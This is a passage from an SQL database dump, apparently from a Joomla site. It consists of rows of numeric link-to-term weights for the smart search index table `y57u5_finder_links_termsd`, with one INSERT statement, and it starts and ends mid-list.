(255, 102169, 0.84),
(288, 102169, 0.84),
(255, 102172, 0.32669),
(274, 102172, 0.65338),
(247, 108406, 1.00331),
(256, 108406, 1.00331),
(257, 108406, 1.00331),
(247, 108414, 0.84),
(256, 108414, 0.84),
(257, 108414, 0.84),
(275, 108414, 0.84),
(306, 108414, 0.84),
(257, 110403, 0.88669),
(263, 110403, 0.88669),
(257, 110405, 0.95669),
(262, 110405, 0.95669),
(257, 110406, 0.91),
(274, 110406, 0.91),
(257, 110409, 0.95669),
(267, 110409, 0.95669),
(257, 110413, 0.95669),
(269, 110413, 0.95669),
(178, 110414, 0.86331),
(257, 110414, 0.86331),
(259, 110414, 0.86331),
(260, 110414, 0.86331),
(263, 110414, 0.86331),
(275, 110414, 0.86331),
(288, 110414, 0.86331),
(242, 110414, 2.58993),
(240, 110421, 0.84),
(257, 110421, 0.84),
(256, 115382, 0.81669),
(292, 115382, 0.81669),
(178, 115382, 1.63338),
(241, 116502, 0.51331),
(242, 116502, 0.51331),
(243, 116502, 0.51331),
(272, 116502, 0.51331),
(280, 116502, 0.51331),
(241, 116503, 1.02669),
(242, 116503, 1.02669),
(240, 118062, 0.86331),
(242, 118062, 0.86331),
(240, 147718, 0.91),
(248, 147718, 0.91),
(274, 147718, 0.91),
(290, 147718, 0.91),
(240, 147722, 0.98),
(259, 147722, 0.98),
(260, 147722, 0.98),
(288, 147722, 0.98),
(244, 147723, 0.98),
(240, 147723, 1.96),
(240, 147726, 0.86331),
(247, 147726, 0.86331),
(242, 150042, 0.88669),
(243, 150042, 0.88669),
(272, 150042, 0.88669),
(280, 150042, 0.88669),
(288, 150042, 0.88669),
(292, 150042, 0.88669),
(174, 150042, 1.77338),
(243, 157611, 0.93331),
(274, 157611, 0.93331),
(243, 157622, 0.86331),
(263, 157622, 0.86331),
(243, 157637, 0.84),
(262, 157637, 0.84),
(178, 157649, 0.23331),
(243, 157649, 0.23331),
(258, 157649, 0.23331),
(243, 157655, 0.81669),
(248, 157655, 0.81669),
(265, 157655, 0.81669),
(266, 157655, 0.81669),
(243, 157659, 0.91),
(258, 157659, 0.91),
(263, 157659, 0.91),
(269, 157659, 0.91),
(241, 159470, 1.14331),
(273, 159470, 2.28662),
(241, 159482, 0.42),
(272, 159482, 0.42),
(280, 159482, 0.42),
(241, 159488, 0.86331),
(268, 159488, 0.86331),
(242, 169463, 0.98),
(272, 169463, 0.98),
(280, 169463, 0.98),
(242, 169471, 1.09669),
(262, 169471, 1.09669),
(242, 169492, 0.86331),
(264, 169492, 0.86331),
(242, 169514, 0.37331),
(246, 169514, 0.37331),
(292, 169514, 0.74662),
(259, 173659, 1.02669),
(260, 173659, 1.02669),
(259, 173660, 0.93331),
(260, 173660, 0.93331),
(259, 173661, 0.86331),
(260, 173661, 0.86331),
(259, 173662, 0.98),
(260, 173662, 0.98),
(259, 173663, 1.02669),
(260, 173663, 1.02669),
(259, 173664, 0.95669),
(260, 173664, 0.95669),
(263, 173665, 0.95669),
(272, 173665, 0.95669),
(280, 173665, 0.95669),
(259, 173665, 2.87007),
(260, 173665, 2.87007),
(259, 173666, 1.05),
(260, 173666, 1.05),
(259, 173667, 1.02669),
(260, 173667, 1.02669),
(259, 173668, 1.07331),
(260, 173668, 1.07331),
(259, 173669, 1.00331),
(260, 173669, 1.00331),
(259, 173670, 1.05),
(260, 173670, 1.05),
(263, 173670, 1.05),
(270, 173670, 1.05),
(272, 173670, 1.05),
(280, 173670, 1.05),
(301, 173670, 1.05),
(259, 173671, 1.02669),
(260, 173671, 1.02669),
(259, 173672, 1.05),
(260, 173672, 1.05),
(259, 173673, 0.88669),
(260, 173673, 0.88669),
(259, 173674, 1.07331),
(260, 173674, 1.07331),
(259, 173675, 0.86331),
(260, 173675, 0.86331),
(259, 173676, 1.02669),
(260, 173676, 1.02669),
(259, 173677, 0.95669),
(260, 173677, 0.95669),
(244, 176958, 0.81669),
(269, 176958, 1.63338),
(244, 176969, 0.98),
(305, 176969, 0.98),
(274, 176969, 1.96),
(178, 178769, 0.88669),
(245, 178769, 0.88669),
(247, 178769, 0.88669),
(274, 178769, 0.88669),
(262, 178769, 1.77338),
(245, 178771, 0.86331),
(246, 178771, 0.86331),
(262, 178771, 0.86331),
(245, 178775, 7.59981),
(248, 178775, 7.59981),
(161, 189652, 2.15339),
(161, 189653, 2.55),
(161, 189654, 1.07331),
(161, 189655, 1.16669),
(161, 189656, 0.93331),
(161, 189657, 1.02669),
(161, 189658, 0.95669),
(161, 189659, 1.21331),
(161, 189660, 0.23331),
(249, 189660, 0.23331),
(263, 189660, 0.23331),
(161, 189661, 1.02669),
(161, 189662, 1.21331),
(161, 189663, 0.88669),
(161, 189664, 1.09669),
(161, 189665, 0.23331),
(161, 189666, 0.98),
(161, 189667, 1.16669),
(161, 189668, 0.28),
(161, 189669, 1.00331),
(161, 189670, 1.09669),
(161, 189671, 0.98),
(161, 189672, 1.09669),
(161, 189673, 0.91),
(161, 189674, 1.05),
(161, 189675, 0.86331),
(161, 189676, 0.98),
(161, 189677, 0.32669),
(161, 189678, 1.00331),
(161, 189679, 1.07331),
(193, 191337, 0.91),
(263, 191337, 0.91),
(272, 191337, 0.91),
(280, 191337, 0.91),
(288, 191337, 0.91),
(174, 191342, 0.93331),
(193, 191342, 0.93331),
(263, 191342, 0.93331),
(306, 191342, 0.93331),
(264, 191342, 1.86662),
(193, 191393, 0.88669),
(263, 191393, 0.88669),
(265, 191393, 0.88669),
(266, 191393, 0.88669),
(268, 191393, 1.77338),
(292, 191393, 2.66007),
(168, 198066, 1.12),
(168, 198067, 0.88669),
(168, 198068, 0.98),
(168, 198069, 1.02669),
(168, 198070, 0.98),
(168, 198071, 2.28662),
(168, 198072, 1.00331),
(168, 198073, 0.93331),
(168, 198074, 1.00331),
(168, 198075, 0.88669),
(168, 198076, 1.07331),
(168, 198077, 1.00331),
(168, 198078, 0.86331),
(168, 198079, 0.93331),
(168, 198080, 0.23331),
(168, 198081, 0.98),
(168, 198082, 1.16669),
(168, 198083, 0.91),
(168, 198084, 0.91),
(168, 198085, 1.05),
(168, 198086, 0.88669),
(168, 198087, 1.05),
(168, 198088, 1.12),
(168, 198089, 0.98),
(174, 198089, 0.98),
(168, 198090, 1.07331),
(168, 198091, 0.95669),
(168, 198092, 1.07331),
(168, 198093, 0.86331),
(168, 198094, 0.93331),
(168, 198095, 0.95669),
(168, 198096, 1.12008),
(178, 198096, 1.12008),
(294, 198096, 1.12008),
(168, 198097, 3.6),
(178, 198097, 3.6),
(294, 198097, 3.6),
(174, 201305, 1.02669),
(178, 201305, 1.02669),
(174, 215596, 0.81669),
(174, 215597, 0.91),
(174, 215598, 0.95669),
(174, 215599, 0.84),
(174, 215600, 0.91),
(174, 215601, 0.91),
(174, 215602, 1.02669),
(174, 215603, 0.84),
(290, 215603, 0.84),
(174, 215604, 0.95669),
(174, 215605, 1.00331),
(174, 215606, 1.00331),
(174, 215607, 2.1),
(174, 215608, 2.05338),
(174, 215609, 0.93331),
(174, 215610, 1.05),
(174, 215611, 1.07331),
(174, 215612, 0.84),
(174, 215613, 0.98),
(174, 215614, 4.24008),
(237, 215614, 4.24008),
(250, 215614, 4.24008),
(251, 215614, 4.24008),
(252, 215614, 4.24008),
(253, 215614, 4.24008),
(254, 215614, 4.24008),
(256, 215614, 4.24008),
(265, 215614, 4.24008),
(266, 215614, 4.24008),
(267, 215614, 4.24008),
(268, 215614, 4.24008),
(269, 215614, 4.24008),
(270, 215614, 4.24008),
(272, 215614, 4.24008),
(273, 215614, 4.24008),
(274, 215614, 4.24008),
(275, 215614, 4.24008),
(280, 215614, 4.24008),
(288, 215614, 4.24008),
(290, 215614, 4.24008),
(292, 215614, 4.24008),
(299, 215614, 4.24008),
(301, 215614, 4.24008),
(174, 215615, 1.07331),
(174, 215616, 1.72662),
(174, 215617, 2.33338),
(174, 215618, 0.95669),
(174, 215619, 1.05),
(174, 215620, 1.19),
(174, 215621, 0.91),
(174, 215622, 1.02669),
(174, 215623, 0.86331),
(174, 215624, 0.95669),
(174, 215625, 1.02669),
(174, 215626, 0.98),
(174, 215627, 0.88669),
(174, 215628, 1.12),
(174, 215629, 1.16669),
(174, 215630, 0.98),
(174, 215631, 1.09669),
(174, 215632, 1.00331),
(174, 215633, 1.07331),
(174, 215634, 0.91),
(174, 215635, 0.98),
(174, 215636, 1.07331),
(174, 215637, 0.93331),
(174, 215638, 1.07331),
(174, 215639, 1.12),
(174, 215640, 0.91),
(174, 215641, 1.00331),
(248, 217524, 0.28),
(262, 217524, 0.28),
(306, 217524, 0.56),
(262, 217538, 0.88669),
(272, 217538, 0.88669),
(275, 217538, 0.88669),
(280, 217538, 0.88669),
(292, 217538, 0.88669),
(178, 222461, 0.09338),
(306, 222461, 0.09338),
(178, 222462, 1.63338),
(178, 222463, 0.98),
(178, 222464, 0.91),
(178, 222465, 0.93331),
(178, 222466, 1.00331),
(178, 222467, 0.18669),
(178, 222468, 0.86331),
(178, 222469, 0.98),
(178, 222470, 0.28),
(178, 222471, 0.88669),
(178, 222472, 1.05),
(178, 222473, 1.91338),
(178, 222474, 1.00331),
(178, 222475, 1.12),
(178, 222476, 0.93331),
(306, 222476, 0.93331),
(178, 222477, 1.02669),
(306, 222477, 1.02669),
(274, 222478, 0.84),
(306, 222478, 0.84),
(178, 222478, 1.68),
(178, 222479, 1.14331),
(178, 222480, 0.98),
(178, 222481, 0.93331),
(178, 222482, 0.93331),
(178, 222483, 0.98),
(178, 222484, 1.07331),
(178, 222485, 0.95669),
(178, 222486, 1.05),
(178, 222487, 1.02669),
(178, 222488, 2.79993),
(178, 222489, 1.02669),
(178, 222490, 0.91),
(178, 222491, 0.98),
(178, 222492, 0.88669),
(178, 222493, 1.02669),
(178, 222494, 4.2),
(178, 222495, 0.95669),
(178, 222496, 1.00331),
(178, 222497, 0.95669),
(178, 222498, 0.98),
(178, 222499, 1.09669),
(178, 222500, 1.00331),
(178, 222501, 0.91),
(178, 222502, 0.88669),
(178, 222503, 0.95669),
(178, 222504, 0.93331),
(178, 222505, 1.07331),
(178, 222506, 0.93331),
(178, 222507, 1.05),
(178, 222508, 1.07331),
(178, 222509, 0.93331),
(178, 222510, 0.91),
(178, 222511, 0.93331),
(178, 222512, 0.28),
(178, 222513, 1.02669),
(178, 222514, 1.21331),
(178, 222515, 0.23331),
(178, 222516, 0.91),
(178, 222517, 1.02669),
(178, 222518, 0.95669),
(178, 222519, 1.05),
(247, 229100, 0.84),
(267, 229100, 0.84),
(247, 229107, 0.98),
(248, 229107, 0.98),
(248, 233632, 0.37331),
(273, 233632, 0.37331),
(275, 233632, 3.41312),
(193, 239061, 1.05),
(193, 239062, 1.12),
(193, 239063, 1.09669),
(193, 239064, 1.16669),
(193, 239065, 0.98),
(193, 239066, 0.98),
(304, 239066, 0.98),
(193, 239067, 0.98),
(193, 239068, 1.05),
(193, 239069, 0.88669),
(193, 239070, 0.88669),
(193, 239071, 1.09669),
(193, 239072, 0.98),
(193, 239073, 0.95669),
(193, 239074, 1.09669),
(193, 239075, 0.98),
(193, 239076, 1.12),
(287, 239077, 0.91),
(193, 239077, 1.82),
(193, 239078, 0.98),
(193, 239079, 0.88669),
(193, 239080, 1.00331),
(193, 239081, 1.05),
(193, 239082, 0.98),
(193, 239083, 7.51317),
(193, 239084, 3.08007),
(193, 239085, 0.14),
(273, 239085, 0.14),
(287, 239085, 0.14),
(193, 239086, 0.88669),
(193, 239087, 0.95669),
(193, 239088, 0.95669),
(193, 239089, 0.98),
(193, 239090, 1.05),
(193, 239091, 0.98),
(193, 239092, 1.82),
(193, 239093, 0.98),
(193, 239094, 1.05),
(193, 239095, 1.00331),
(193, 239096, 1.07331),
(193, 239097, 0.91),
(193, 239098, 1.07331),
(193, 239099, 0.98),
(193, 239100, 0.93331),
(193, 239101, 1.00331),
(193, 239102, 0.95669),
(193, 239103, 0.93331),
(193, 239104, 1.07331),
(193, 239105, 0.93331),
(193, 239106, 1.05),
(193, 239107, 0.98),
(193, 239108, 0.46669),
(193, 239109, 1.05),
(193, 239110, 1.16669),
(193, 239111, 1.00331),
(193, 239112, 1.09669),
(193, 239113, 0.95669),
(193, 239114, 1.09669),
(193, 239115, 0.98),
(193, 239116, 1.09669),
(193, 239117, 0.98),
(193, 239118, 1.12),
(193, 239119, 0.37331),
(193, 239120, 0.95669),
(193, 239121, 1.05),
(193, 239122, 1.09669),
(193, 239123, 0.84),
(193, 239124, 1.02669),
(193, 239125, 0.23331),
(193, 239126, 0.91),
(193, 239127, 1.05),
(268, 247775, 0.93331),
(273, 247775, 0.93331),
(274, 247775, 0.93331),
(270, 250604, 0.91),
(301, 250604, 0.91),
(270, 250605, 0.95669),
(301, 250605, 0.95669),
(270, 250606, 2.00662),
(301, 250606, 2.00662),
(270, 250607, 1.07331),
(301, 250607, 1.07331),
(265, 250608, 1.02669),
(266, 250608, 1.02669),
(270, 250608, 1.02669),
(301, 250608, 1.02669),
(270, 250609, 1.02669),
(301, 250609, 1.02669),
(270, 250610, 0.95669),
(301, 250610, 0.95669),
(270, 250611, 1.00331),
(301, 250611, 1.00331),
(270, 250612, 1.05),
(301, 250612, 1.05),
(270, 250613, 1.14331),
(301, 250613, 1.14331),
(270, 250614, 1.05),
(301, 250614, 1.05),
(270, 250615, 1.14331),
(301, 250615, 1.14331),
(270, 250616, 1.07331),
(301, 250616, 1.07331),
(270, 250617, 1.14331),
(301, 250617, 1.14331),
(270, 250618, 0.42),
(301, 250618, 0.42),
(305, 250618, 0.42),
(270, 250619, 0.98),
(301, 250619, 0.98),
(270, 250620, 1.07331),
(301, 250620, 1.07331),
(270, 250621, 1.00331),
(301, 250621, 1.00331),
(270, 250622, 1.05),
(301, 250622, 1.05),
(270, 250623, 0.98),
(301, 250623, 0.98),
(265, 251219, 0.91),
(266, 251219, 0.91),
(265, 251220, 0.95669),
(266, 251220, 0.95669),
(265, 251221, 1.21331),
(266, 251221, 1.21331),
(265, 251222, 0.86331),
(266, 251222, 0.86331),
(265, 251223, 0.95669),
(266, 251223, 0.95669),
(265, 251224, 0.98),
(266, 251224, 0.98),
(265, 251225, 1.02669),
(266, 251225, 1.02669),
(265, 251226, 0.86331),
(266, 251226, 0.86331),
(265, 251227, 0.95669),
(266, 251227, 0.95669),
(265, 251228, 2.00662),
(266, 251228, 2.00662),
(265, 251229, 1.09669),
(266, 251229, 1.09669),
(265, 251230, 1.14331),
(266, 251230, 1.14331),
(272, 253444, 1.09669),
(280, 253444, 1.09669),
(272, 253445, 1.19),
(280, 253445, 1.19),
(272, 253446, 1.07331),
(280, 253446, 1.07331),
(272, 253447, 1.14331),
(280, 253447, 1.14331),
(272, 253450, 1.21331),
(280, 253450, 1.21331),
(272, 253452, 1.05),
(280, 253452, 1.05),
(272, 253453, 1.12),
(280, 253453, 1.12),
(272, 253454, 1.07331),
(280, 253454, 1.07331),
(272, 253455, 1.23669),
(280, 253455, 1.23669),
(272, 253456, 1.00331),
(280, 253456, 1.00331),
(272, 253457, 0.91),
(280, 253457, 0.91),
(272, 253458, 1.00331),
(280, 253458, 1.00331),
(272, 253459, 0.93331),
(280, 253459, 0.93331),
(272, 253460, 0.98),
(280, 253460, 0.98),
(272, 253461, 0.98),
(280, 253461, 0.98),
(272, 253462, 0.98),
(280, 253462, 0.98),
(272, 253463, 0.91),
(280, 253463, 0.91),
(272, 253464, 1.07331),
(280, 253464, 1.07331),
(272, 253465, 0.88669),
(280, 253465, 0.88669),
(272, 253466, 0.98),
(280, 253466, 0.98),
(272, 253467, 0.86331),
(280, 253467, 0.86331),
(272, 253468, 0.95669),
(280, 253468, 0.95669),
(272, 253469, 0.60669),
(280, 253469, 0.60669),
(272, 253470, 1.16669),
(280, 253470, 1.16669),
(272, 253471, 1.23669),
(280, 253471, 1.23669),
(272, 253472, 1.19),
(280, 253472, 1.19),
(272, 253473, 1.28331),
(280, 253473, 1.28331),
(272, 253474, 0.86331),
(280, 253474, 0.86331),
(272, 253475, 0.93331),
(280, 253475, 0.93331),
(272, 253476, 0.95669),
(280, 253476, 0.95669),
(272, 253477, 1.09669),
(280, 253477, 1.09669),
(272, 253478, 0.93331),
(280, 253478, 0.93331),
(272, 253479, 1.05),
(280, 253479, 1.05),
(272, 253480, 1.14331),
(280, 253480, 1.14331),
(272, 253481, 0.93331),
(280, 253481, 0.93331),
(272, 253482, 1.07331),
(280, 253482, 1.07331),
(272, 253483, 1.00331),
(280, 253483, 1.00331),
(272, 253484, 1.14331),
(280, 253484, 1.14331),
(272, 253485, 0.93331),
(280, 253485, 0.93331),
(272, 253486, 1.05),
(280, 253486, 1.05),
(272, 253487, 1.00331),
(275, 253487, 1.00331),
(280, 253487, 1.00331),
(272, 253488, 0.42),
(280, 253488, 0.42),
(272, 253489, 1.16669),
(280, 253489, 1.16669),
(272, 253490, 1.28331),
(280, 253490, 1.28331),
(272, 253491, 1.07331),
(280, 253491, 1.07331),
(272, 253492, 1.37669),
(280, 253492, 1.37669),
(273, 256362, 5.32),
(273, 256363, 1.19),
(273, 256364, 4.85677),
(273, 256365, 1.00331),
(273, 256366, 1.09669),
(273, 256367, 1.00331),
(273, 256368, 1.07331),
(273, 256369, 1.00331),
(273, 256370, 1.14331),
(292, 256371, 0.28),
(306, 256371, 0.28),
(275, 256371, 0.84),
(273, 256371, 1.12),
(273, 256372, 0.88669),
(273, 256373, 0.98),
(273, 256374, 0.93331),
(292, 256374, 0.93331),
(273, 256375, 1.02669),
(273, 256376, 1.00331),
(273, 256377, 1.07331),
(273, 256378, 1.09669),
(273, 256379, 1.14331),
(273, 256380, 1.91338),
(273, 256381, 1.09669),
(273, 256382, 1.07331),
(273, 256383, 0.98),
(273, 256384, 1.05),
(273, 256385, 1.05),
(273, 256386, 1.21331),
(273, 256387, 0.93331),
(273, 256388, 1.14331),
(273, 256389, 0.98),
(274, 256389, 0.98),
(273, 256390, 1.07331),
(273, 256391, 1.02669),
(273, 256392, 0.95669),
(273, 256393, 1.00331),
(273, 256394, 1.00331),
(273, 256395, 0.88669),
(273, 256396, 1.09669),
(273, 256397, 0.88669),
(273, 256398, 0.95669),
(273, 256399, 0.95669),
(274, 256399, 0.95669),
(273, 256400, 0.88669),
(273, 256401, 0.98),
(273, 256402, 0.91),
(273, 256403, 0.98),
(273, 256404, 0.81669),
(273, 256405, 0.95669),
(273, 256406, 1.02669),
(273, 256407, 1.09669),
(273, 256408, 1.77338),
(273, 256409, 0.98),
(273, 256410, 0.98),
(274, 260575, 0.65331),
(275, 260575, 0.65331),
(280, 260575, 0.65331),
(233, 266604, 0.98),
(233, 266605, 0.88669),
(233, 266606, 1.05),
(233, 266607, 0.88669),
(233, 266608, 0.95669),
(233, 266609, 0.98),
(233, 266610, 0.91),
(233, 266611, 0.95669),
(233, 266612, 0.88669),
(233, 266613, 1.07331),
(233, 266614, 0.81669),
(233, 266615, 0.95669),
(233, 266616, 0.93331),
(233, 266617, 0.95669),
(233, 266618, 1.09669),
(235, 267861, 1.07331),
(235, 267862, 5.4668),
(235, 267863, 1.14331),
(235, 267864, 1.02669),
(235, 267865, 2.32339),
(235, 267866, 2.72),
(235, 267867, 1.05),
(235, 267868, 1.12),
(235, 267869, 0.95669),
(235, 267870, 0.95669),
(235, 267871, 1.23669),
(235, 267872, 1.05),
(235, 267873, 0.93331),
(235, 267874, 0.93331),
(235, 267875, 1.02669),
(235, 267876, 0.95669),
(235, 267877, 1.14331),
(235, 267878, 1.05),
(235, 267879, 1.02669),
(235, 267880, 0.46669),
(235, 267881, 1.02669),
(235, 267882, 1.30669),
(235, 267883, 0.84),
(235, 267884, 0.95669),
(235, 267885, 0.98),
(235, 267886, 1.07331),
(235, 267887, 0.88669),
(235, 267888, 1.05),
(235, 267889, 0.93331),
(235, 267890, 0.93331),
(235, 267891, 1.00331),
(235, 267892, 0.93331),
(235, 267893, 1.02669),
(235, 267894, 2.66007),
(235, 267895, 0.98),
(235, 267896, 0.95669),
(235, 267897, 0.95669),
(235, 267898, 0.93331),
(235, 267899, 1.00331),
(235, 267900, 0.88669),
(235, 267901, 1.00331),
(235, 267902, 0.88669),
(235, 267903, 1.02669),
(236, 268967, 0.93331),
(236, 268968, 1.12),
(236, 268969, 0.91),
(236, 268970, 1.09669),
(236, 268971, 0.93331),
(236, 268972, 1.12),
(236, 268973, 0.93331),
(236, 268974, 1.09669),
(236, 268975, 0.91),
(236, 268976, 1.00331),
(236, 268977, 0.86331),
(236, 268978, 1.05),
(236, 268979, 1.12),
(236, 268980, 1.05),
(236, 268981, 1.07331),
(236, 268982, 0.88669),
(236, 268983, 1.96),
(236, 268984, 2.14662),
(236, 268985, 0.86331),
(236, 268986, 1.00331),
(236, 268987, 0.98),
(236, 268988, 0.98),
(236, 268989, 1.05),
(236, 268990, 0.93331),
(236, 268991, 1.02669),
(236, 268992, 1.09669),
(236, 268993, 0.88669),
(236, 268994, 1.09669),
(236, 268995, 0.91),
(236, 268996, 0.98),
(236, 268997, 0.98),
(236, 268998, 0.84),
(236, 268999, 0.93331),
(236, 269000, 1.12),
(236, 269001, 1.00331),
(236, 269002, 0.91),
(236, 269003, 0.98),
(236, 269004, 1.14331),
(236, 269005, 0.98),
(236, 269006, 0.98),
(236, 269007, 0.93331),
(236, 269008, 1.12),
(236, 269009, 0.95669),
(236, 269010, 1.09669),
(236, 269011, 0.84),
(236, 269012, 0.88669),
(236, 269013, 1.00331),
(236, 269014, 1.07331),
(236, 269015, 0.93331),
(236, 269016, 1.14331),
(236, 269017, 1.02669),
(236, 269018, 1.14331),
(236, 269019, 0.18669),
(236, 269020, 0.86331),
(236, 269021, 0.93331),
(237, 269719, 1.00331),
(237, 269720, 0.95669),
(237, 269721, 1.05),
(237, 269722, 1.07331),
(237, 269723, 1.02669),
(237, 269724, 0.91),
(237, 269725, 1.00331),
(237, 269726, 0.95669),
(237, 269727, 1.02669),
(237, 269728, 0.37331),
(292, 269728, 0.37331),
(237, 269729, 1.02669),
(237, 269730, 1.16669),
(237, 269731, 0.95669),
(237, 269732, 1.07331),
(237, 269733, 0.93331),
(237, 269734, 1.09669),
(237, 269735, 1.96),
(237, 269736, 1.02669),
(237, 269737, 1.07331),
(238, 271191, 0.37331),
(238, 271192, 0.95669),
(238, 271193, 1.21331),
(238, 271194, 1.00331),
(238, 271195, 1.09669),
(238, 271196, 1.09669),
(238, 271197, 1.02669),
(238, 271198, 1.16669),
(238, 271199, 0.98),
(238, 271200, 1.07331),
(238, 271201, 1.05),
(238, 271202, 1.00331),
(238, 271203, 1.07331),
(238, 271204, 0.98),
(238, 271205, 1.05),
(238, 271206, 1.12),
(238, 271207, 1.02669),
(238, 271208, 1.05),
(238, 271209, 0.98),
(238, 271210, 0.98),
(238, 271211, 1.05),
(238, 271212, 0.93331),
(238, 271213, 1.14331),
(238, 271214, 0.88669),
(238, 271215, 0.98),
(238, 271216, 1.05),
(238, 271217, 1.02669),
(238, 271218, 1.00331),
(238, 271219, 1.00331),
(238, 271220, 0.88669),
(238, 271221, 0.93331),
(238, 271222, 0.98),
(238, 271223, 0.98),
(238, 271224, 0.95669),
(238, 271225, 1.05),
(238, 271226, 1.07331),
(238, 271227, 0.86331),
(238, 271228, 1.00331),
(238, 271229, 0.93331),
(238, 271230, 0.32669),
(238, 271231, 0.95669),
(238, 271232, 1.09669),
(238, 271233, 0.98),
(238, 271234, 0.86331),
(238, 271235, 0.91),
(239, 273264, 0.23331),
(239, 273265, 1.14331),
(239, 273266, 1.30669),
(239, 273267, 0.95669),
(239, 273268, 1.05),
(239, 273269, 0.37331),
(239, 273270, 1.00331),
(239, 273271, 1.09669),
(239, 273272, 0.95669),
(239, 273273, 1.02669),
(239, 273274, 0.93331),
(239, 273275, 1.07331),
(239, 273276, 1.12),
(239, 273277, 1.09669),
(239, 273278, 1.12),
(239, 273279, 0.95669),
(239, 273280, 1.09669),
(239, 273281, 0.84),
(239, 273282, 0.93331),
(239, 273283, 1.14331),
(239, 273284, 1.07331),
(239, 273285, 1.14331),
(239, 273286, 1.05),
(239, 273287, 0.95669),
(239, 273288, 0.95669),
(239, 273289, 0.98),
(239, 273290, 1.09669),
(239, 273291, 1.07331),
(239, 273292, 1.86662),
(239, 273293, 1.07331),
(239, 273294, 1.16669),
(239, 273295, 0.86331),
(239, 273296, 0.95669),
(239, 273297, 0.95669),
(239, 273298, 0.95669),
(239, 273299, 1.07331),
(239, 273300, 0.91),
(239, 273301, 1.00331),
(239, 273302, 1.02669),
(239, 273303, 0.95669),
(239, 273304, 0.88669),
(239, 273305, 0.98),
(239, 273306, 0.93331),
(239, 273307, 1.23669),
(239, 273308, 0.93331),
(239, 273309, 0.98),
(239, 273310, 0.95669),
(239, 273311, 1.16669),
(239, 273312, 1.12),
(239, 273313, 1.4),
(239, 273314, 0.84),
(239, 273315, 1.09669),
(239, 273316, 0.86331),
(239, 273317, 0.91),
(239, 273318, 0.91),
(239, 273319, 0.98),
(239, 273320, 0.86331),
(239, 273321, 0.93331),
(239, 273322, 1.00331),
(239, 273323, 0.95669),
(239, 273324, 1.05),
(239, 273325, 1.07331),
(239, 273326, 1.14331),
(239, 273327, 0.95669),
(239, 273328, 1.86662),
(239, 273329, 0.98),
(239, 273330, 1.05),
(239, 273331, 0.91),
(239, 273332, 1.09669),
(240, 275465, 1.07331),
(240, 275466, 1.19),
(240, 275467, 0.93331),
(240, 275468, 1.09669),
(240, 275469, 3.54676),
(240, 275470, 3.08007),
(240, 275471, 0.98),
(240, 275472, 0.88669),
(240, 275473, 1.02669),
(240, 275474, 1.02669),
(240, 275475, 0.91),
(305, 275475, 0.91),
(240, 275476, 1.05),
(240, 275477, 1.09669),
(240, 275478, 0.98),
(240, 275479, 0.91),
(240, 275480, 0.93331),
(240, 275481, 0.46669),
(240, 275482, 1.09669),
(240, 275483, 1.14331),
(240, 275484, 0.56);
INSERT INTO `y57u5_finder_links_termsd` (`link_id`, `term_id`, `weight`) VALUES
(240, 275485, 1.16669),
(240, 275486, 1.23669),
(240, 275487, 0.37331),
(240, 275488, 0.95669),
(240, 275489, 1.05),
(240, 275490, 0.93331),
(240, 275491, 1.05),
(240, 275492, 0.98),
(240, 275493, 0.91),
(240, 275494, 1.05),
(240, 275495, 1.91338),
(240, 275496, 1.05),
(240, 275497, 0.91),
(240, 275498, 1.02669),
(240, 275499, 1.77338),
(240, 275500, 1.19),
(240, 275501, 0.95669),
(240, 275502, 0.91),
(240, 275503, 1.02669),
(240, 275504, 0.86331),
(240, 275505, 0.95669),
(240, 275506, 0.98),
(240, 275507, 1.19),
(240, 275508, 0.86331),
(240, 275509, 1.05),
(240, 275510, 0.88669),
(292, 275510, 0.88669),
(240, 275511, 0.95669),
(240, 275512, 1.05),
(240, 275513, 0.81669),
(240, 275514, 0.93331),
(240, 275515, 0.93331),
(240, 275516, 0.91),
(240, 275517, 1.05),
(240, 275518, 0.91),
(306, 275518, 1.82),
(240, 275519, 1.05),
(240, 275520, 0.93331),
(240, 275521, 0.98),
(240, 275522, 1.02669),
(240, 275523, 1.16669),
(240, 275524, 0.98),
(240, 275525, 0.98),
(240, 275526, 1.07331),
(240, 275527, 0.46669),
(240, 275528, 1.02669),
(240, 275529, 1.07331),
(241, 277019, 0.95669),
(241, 277020, 0.95669),
(306, 277021, 0.98),
(241, 277021, 1.96),
(241, 277022, 0.86331),
(241, 277023, 0.93331),
(241, 277024, 1.00331),
(241, 277025, 0.98),
(241, 277026, 1.02669),
(241, 277027, 0.95669),
(241, 277028, 1.00331),
(241, 277029, 0.28),
(241, 277030, 0.91),
(241, 277031, 1.05),
(241, 277032, 0.98),
(241, 277033, 0.86331),
(241, 277034, 0.93331),
(241, 277035, 0.91),
(241, 277036, 1.00331),
(241, 277037, 1.21331),
(241, 277038, 1.00331),
(241, 277039, 1.14331),
(241, 277040, 0.95669),
(241, 277041, 1.00331),
(241, 277042, 1.09669),
(241, 277043, 0.93331),
(241, 277044, 0.91),
(241, 277045, 1.00331),
(241, 277046, 0.91),
(241, 277047, 1.12),
(242, 278740, 0.88669),
(242, 278741, 0.98),
(242, 278742, 0.91),
(242, 278743, 1.00331),
(242, 278744, 0.42),
(242, 278745, 1.02669),
(242, 278746, 1.12),
(242, 278747, 0.32669),
(242, 278748, 0.98),
(242, 278749, 1.07331),
(242, 278750, 1.12),
(242, 278751, 1.37669),
(242, 278752, 1.02669),
(242, 278753, 1.00331),
(299, 278753, 1.00331),
(242, 278754, 0.91),
(242, 278755, 0.93331),
(242, 278756, 0.84),
(242, 278757, 0.91),
(242, 278758, 1.02669),
(242, 278759, 1.12),
(242, 278760, 0.93331),
(242, 278761, 1.07331),
(242, 278762, 1.00331),
(242, 278763, 1.12),
(242, 278764, 1.02669),
(242, 278765, 1.23669),
(242, 278766, 0.84),
(242, 278767, 0.93331),
(242, 278768, 0.93331),
(242, 278769, 1.05),
(242, 278770, 1.02669),
(242, 278771, 1.07331),
(242, 278772, 0.93331),
(242, 278773, 0.86331),
(242, 278774, 0.95669),
(242, 278775, 0.98),
(242, 278776, 1.16669),
(242, 278777, 0.98),
(242, 278778, 1.09669),
(242, 278779, 3.21993),
(242, 278780, 1.14331),
(242, 278781, 1.14331),
(242, 278782, 1.26),
(242, 278783, 0.88669),
(242, 278784, 0.95669),
(242, 278785, 0.93331),
(242, 278786, 1.05),
(242, 278787, 0.84),
(242, 278788, 1.00331),
(242, 278789, 0.91),
(242, 278790, 0.95669),
(242, 278791, 1.07331),
(242, 278792, 1.02669),
(242, 278793, 1.05),
(242, 278794, 0.98),
(242, 278795, 0.93331),
(242, 278796, 1.02669),
(242, 278797, 0.95669),
(242, 278798, 1.00331),
(242, 278799, 1.05),
(288, 278799, 1.05),
(242, 278800, 0.93331),
(242, 278801, 1.00331),
